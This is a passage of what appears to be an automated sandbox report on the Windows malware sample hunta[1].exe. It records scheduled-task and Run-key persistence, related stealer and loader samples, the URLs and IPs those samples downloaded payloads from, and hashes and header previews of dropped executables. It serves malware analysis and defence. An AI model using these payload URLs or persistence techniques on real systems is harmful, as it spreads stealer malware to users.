              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:31
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:hunta[1].exe
              Detection:MAL
              Classification:mal100.spre.troj.evad.winEXE@28/31@1/2
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 20.189.173.21
              • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: hunta[1].exe
              TimeTypeDescription
              02:16:33Task SchedulerRun new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
              02:16:33Task SchedulerRun new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
              02:16:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
              02:16:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
              20:16:42API Interceptor1x Sleep call for process: WerFault.exe modified
              20:16:58API Interceptor3652178x Sleep call for process: hunta[1].exe modified
              20:17:05API Interceptor5503x Sleep call for process: MPGPH131.exe modified
              20:17:20API Interceptor4402279x Sleep call for process: RageMP131.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              44.221.84.105FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • ddos.dnsnb8.net:799/cj//k5.rar
              FBD0DD6CFA4C80E07EDB97767D169EC45066A58B9D2FD475BE13BC4A7CC4DFA2.exeGet hashmaliciousBdaejecBrowse
              • ddos.dnsnb8.net:799/cj//k2.rar
              Fantom.exeGet hashmaliciousBdaejecBrowse
              • ddos.dnsnb8.net:799/cj//k3.rar
              FC8BD535BF98089640F0589D3FE30FB55B1287278F9B42D66C91D397E00BA23A.exeGet hashmaliciousBdaejecBrowse
              • ddos.dnsnb8.net:799/cj//k3.rar
              fax_390392029_072514.exeGet hashmaliciousBdaejecBrowse
              • ddos.dnsnb8.net:799/cj//k5.rar
              F5D89DECEF6271D813BE49A3CB4C630364CBA87FDE4FD9BCE81821479D1E771E.exeGet hashmaliciousBdaejec, RedLineBrowse
              • ddos.dnsnb8.net:799/cj//k2.rar
              F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • ddos.dnsnb8.net:799/cj//k5.rar
              F891E10C9A7B6D0CBBBB6B3D103CF3DC935541430C5363648E6E1A3203BDD76D.exeGet hashmaliciousBdaejec, SystemBCBrowse
              • ddos.dnsnb8.net:799/cj//k5.rar
              F898E35329AE242F1F8C0E64EFDE783E9742671336598AD9824073DECAE40F4A.exeGet hashmaliciousBdaejecBrowse
              • ddos.dnsnb8.net:799/cj//k2.rar
              Endermanch@SecurityDefener2015.exeGet hashmaliciousBdaejecBrowse
              • ddos.dnsnb8.net:799/cj//k2.rar
              193.233.132.62SecuriteInfo.com.Win32.PWSX-gen.14899.4987.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              SecuriteInfo.com.Win32.PWSX-gen.580.27252.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              SecuriteInfo.com.Win32.PWSX-gen.15960.19323.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              9iz0QM9rMM.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              4fMLTRkOfB.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              q7a5JOlhLZ.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              7jv1U7CgKF.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              SecuriteInfo.com.Win32.PWSX-gen.10022.32492.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              ddos.dnsnb8.netFC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 44.221.84.105
              FBD0DD6CFA4C80E07EDB97767D169EC45066A58B9D2FD475BE13BC4A7CC4DFA2.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              Fantom.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              FC8BD535BF98089640F0589D3FE30FB55B1287278F9B42D66C91D397E00BA23A.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              fax_390392029_072514.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              F5D89DECEF6271D813BE49A3CB4C630364CBA87FDE4FD9BCE81821479D1E771E.exeGet hashmaliciousBdaejec, RedLineBrowse
              • 44.221.84.105
              F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 44.221.84.105
              F891E10C9A7B6D0CBBBB6B3D103CF3DC935541430C5363648E6E1A3203BDD76D.exeGet hashmaliciousBdaejec, SystemBCBrowse
              • 44.221.84.105
              F898E35329AE242F1F8C0E64EFDE783E9742671336598AD9824073DECAE40F4A.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              Endermanch@SecurityDefener2015.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              AMAZON-AESUSFC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 44.221.84.105
              FBD0DD6CFA4C80E07EDB97767D169EC45066A58B9D2FD475BE13BC4A7CC4DFA2.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              Fantom.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              FC8BD535BF98089640F0589D3FE30FB55B1287278F9B42D66C91D397E00BA23A.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              fax_390392029_072514.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              F5D89DECEF6271D813BE49A3CB4C630364CBA87FDE4FD9BCE81821479D1E771E.exeGet hashmaliciousBdaejec, RedLineBrowse
              • 44.221.84.105
              F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 44.221.84.105
              F891E10C9A7B6D0CBBBB6B3D103CF3DC935541430C5363648E6E1A3203BDD76D.exeGet hashmaliciousBdaejec, SystemBCBrowse
              • 44.221.84.105
              F898E35329AE242F1F8C0E64EFDE783E9742671336598AD9824073DECAE40F4A.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              Endermanch@SecurityDefener2015.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              FREE-NET-ASFREEnetEUExternal Own 4.20.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
              • 147.45.47.64
              Aquantia_Setup 2.11.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
              • 147.45.47.64
              AdobeUpdaterV131.exeGet hashmaliciousBdaejec, RisePro StealerBrowse
              • 193.233.132.62
              installer.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
              • 147.45.47.81
              92.249.48.47-skid.arm7-2024-07-20T09_04_19.elfGet hashmaliciousMirai, MoobotBrowse
              • 147.45.93.156
              conhost.exeGet hashmaliciousXmrigBrowse
              • 147.45.47.81
              http://premium.davidabostic.comGet hashmaliciousUnknownBrowse
              • 147.45.78.74
              Software1.30.1.exeGet hashmaliciousRedLine, XmrigBrowse
              • 147.45.47.81
              arm7.elfGet hashmaliciousMiraiBrowse
              • 147.45.45.222
              SecuriteInfo.com.Win32.RATX-gen.28387.25625.exeGet hashmaliciousPureLog StealerBrowse
              • 193.233.203.218
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                FBD0DD6CFA4C80E07EDB97767D169EC45066A58B9D2FD475BE13BC4A7CC4DFA2.exeGet hashmaliciousBdaejecBrowse
                  Fantom.exeGet hashmaliciousBdaejecBrowse
                    FC8BD535BF98089640F0589D3FE30FB55B1287278F9B42D66C91D397E00BA23A.exeGet hashmaliciousBdaejecBrowse
                      fax_390392029_072514.exeGet hashmaliciousBdaejecBrowse
                        F5D89DECEF6271D813BE49A3CB4C630364CBA87FDE4FD9BCE81821479D1E771E.exeGet hashmaliciousBdaejec, RedLineBrowse
                          F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                            F891E10C9A7B6D0CBBBB6B3D103CF3DC935541430C5363648E6E1A3203BDD76D.exeGet hashmaliciousBdaejec, SystemBCBrowse
                              F898E35329AE242F1F8C0E64EFDE783E9742671336598AD9824073DECAE40F4A.exeGet hashmaliciousBdaejecBrowse
                                Endermanch@SecurityDefener2015.exeGet hashmaliciousBdaejecBrowse
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):19456
                                  Entropy (8bit):6.58967128255197
                                  Encrypted:false
                                  SSDEEP:384:1F6SsXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:rMQGPL4vzZq2o9W7GsxBbPr
                                  MD5:E8926E518D702E273E23516D8095607C
                                  SHA1:FE600523DC305BF668C28829A0E2E5711CC18460
                                  SHA-256:4DF0F8817D5F10C39D7941B5DB21F1457CE7FC92E5EEAD84277CD38A670C57B2
                                  SHA-512:4840992977A24241331CD3C5BDB1FA8E3FBF823799FFB9B6DDACBBFF817F636FCCABC93944C2C1351DDC1857D6DE251BDFFD7FD257104FC96B265B7E95422363
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Reputation:low
                                  Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):2389504
                                  Entropy (8bit):6.731347122097384
                                  Encrypted:false
                                  SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                  MD5:3567D7F256250BA60139D64E5CDDADF1
                                  SHA1:E503F11EF88B81D385A437A49C7001F4218E5864
                                  SHA-256:9BDB458C748BDA278A4ACD28DBDE9BA4B156C84918453F9BDD2FBE348DA1925A
                                  SHA-512:6E00EFEB5DED926B862642C9CC32A25DB893DEB5619B8CAC5B956CF02E2B4BCFD3B61AFE5C5EC85B1116139EE70F636E6B0631D9A38AC449C3050BBBE3BA05A4
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):31744
                                  Entropy (8bit):6.36643340440386
                                  Encrypted:false
                                  SSDEEP:768:uWQ3655Kv1X/qY1MSdkmQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdk9GCq2iW7z
                                  MD5:9D6E2B1583434773B6F38FD7774FC286
                                  SHA1:758F5D46E3C5B52C79928B954E8B5987DFA24E8C
                                  SHA-256:2AC225783B5E4A0644252482C2C6333E741CB26D4E47162469F092D6FEE7612C
                                  SHA-512:918D68A5558C121CB74B50FD482A7ACF9CF7C9AC388A16C7A0A634C3AC74E70D810011287F32735B2AE77776CEAE1A884F766DA0049B045E2817F84F90CC3C01
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\hunta[1].exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):2383872
                                  Entropy (8bit):7.92928937448595
                                  Encrypted:false
                                  SSDEEP:49152:QSPmGpG0CTiBOGt/tP0HtQ0dcMjXyMxB/x5UGn77l7G4bo8jqOs8DoV:bPmG8HTiVtWQXqiMxVQaRGy3qOs8U
                                  MD5:651DE10CFAAA78BE50EDA9F3F0CE9EA7
                                  SHA1:6B922567FC5880E38FC9A3EACC24F6BAB3785731
                                  SHA-256:E5CB4F3F8D41C28116B9FF3253AB5F6D6736E18DA2D225CF15379954B2751643
                                  SHA-512:B3D038963134F43113831D929787AAC25E597E17E763C3955660E7D1ED63539C7A929A19A95AE306B390955FFCBAD89EB3857402BDE3159093AC43DFE9244446
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 95%
                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L......e...............".....,........[...........@..........................`[...........@.................................T...h....p.............................................................................................................. . .`..........................@....rsrc........p... ..................@....idata ............................@... .P+.......... ..............@...gpsaqaiu......?......"..............@...zlufpcnd......Z.......#.............@....taggant.0....Z.."....#.............@......u...P....[..B....$............. ...................................................................................................................................................
                                  Process:C:\Users\user\Desktop\hunta[1].exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.988089933376016
                                  Encrypted:false
                                  SSDEEP:96:fEFin5NbbLsAhnq7afzQXIDcQ3c6ytcEccw3zP+HbHg/5ksS/YyNl1zWDUMsxzLs:8k5NbbLa0JcmUj8fp9zuiFIZ24IO8k4
                                  MD5:5DC3627C6BBA322726BCAECEA42565BA
                                  SHA1:083501501971989D3FAF5A0CDF274E78CB31EA1C
                                  SHA-256:3CFE527B1D0F0635DAF0930FC6E80A9AF3FB070B5F4D333BCD4C1168BEA737D7
                                  SHA-512:0147433C695B3FF5939DC86CAF5E091354776ECD5D2A337387A618093A59A1E4106E2C584FFCF56B54A6072AA83F97B18057EF0FF8752F3B3127197342632A5C
                                  Malicious:false
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.4.0.1.9.7.0.9.9.9.5.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.4.0.1.9.7.7.0.9.3.4.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.8.0.b.3.4.d.-.0.1.3.4.-.4.8.d.0.-.9.a.e.b.-.c.7.7.e.a.d.7.2.c.8.c.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.f.9.b.0.d.2.-.d.5.2.1.-.4.3.3.d.-.b.f.4.4.-.f.6.5.6.d.6.e.6.9.4.1.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.w.K.L.W.F.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.2.0.-.0.0.0.1.-.0.0.1.3.-.d.4.e.c.-.5.d.e.4.2.7.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.6.e.5.9.8.2.5.a.4.0.d.4.9.5.a.f.8.0.e.1.d.3.6.3.0.d.5.3.2.0.d.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.W.w.K.L.W.F.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Thu Jul 25 00:16:37 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):154366
                                  Entropy (8bit):1.8974334253506935
                                  Encrypted:false
                                  SSDEEP:768:ezK5eRBVkuZOpTaZYzOTOezPb19sv/mv6uyN:e9KuY8ZqQzPb19sv/mv6uyN
                                  MD5:377F35EA96F4F0C0F56CE2C7E531AC56
                                  SHA1:87102723D9444709C47B17063D46D66B53BA4E43
                                  SHA-256:1AD0F7D27B90904D1BA6C97059B33803BFF058621B7F42478AD5E453310D1CC9
                                  SHA-512:D0B39011845A3FCE4851709B3FBCFCC14F573AA6AB7086B30ABBEB73BCD03BCF89801E557418A80B07CF39491A4B90998F1E03F63B53D8F1DC7F93CB1E01DF0B
                                  Malicious:false
                                  Preview:MDMP..a..... .......e..f............D...............X.......l.... ......$...VO..........`.......8...........T...........@>..............h!..........T#..............................................................................eJ.......#......GenuineIntel............T....... ...[..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8278
                                  Entropy (8bit):3.699765590623967
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJ8y634e6YMG62gmf+/pD+89bNssfPGvm:R6lXJZ63Z6YN62gmf+tN/fX
                                  MD5:FE5B0CBC2288F8612483C6C3B014C6C9
                                  SHA1:5F442616697D13433DA889E14F46A534CDF5D40D
                                  SHA-256:F891E93668EE552957E2859D251FBFFD8195B81C0CC9FE7D4A3F570578DBEE87
                                  SHA-512:EB848908CE6B8D4AC87C62A4E179984A8B317E4232FAFEDDE01E5E322BA1F19B75D24DE1528721B8D61D97B1D70C1B34C8C9F7CD969CD629420A1A4DA01EFB19
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.5.6.<./.P.i.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4558
                                  Entropy (8bit):4.465464263066446
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zs+Jg77aI9VaWpW8VYVYm8M4Ji/wFM+q8U/4aBkig6ud:uIjf0I7Tb7V9JiFd4Kvg6ud
                                  MD5:2478490B13AE38C86809D73B06B16046
                                  SHA1:B7DAEA54F63C5DEEA760E58531141F2CB00CB18C
                                  SHA-256:30FFA53B8FADFF3BB2178CDA61BA7C4C51F197314EA6F58F3F253C5DD96B6B46
                                  SHA-512:615216BB2DDB3B7F59E716C1A24EBBA232993A3ADA821FF26D6B4EDA13C91172D31E30D13BC3C9E7F8425E8D54ACD1B723235663167456002CC33B384BC35307
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425719" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
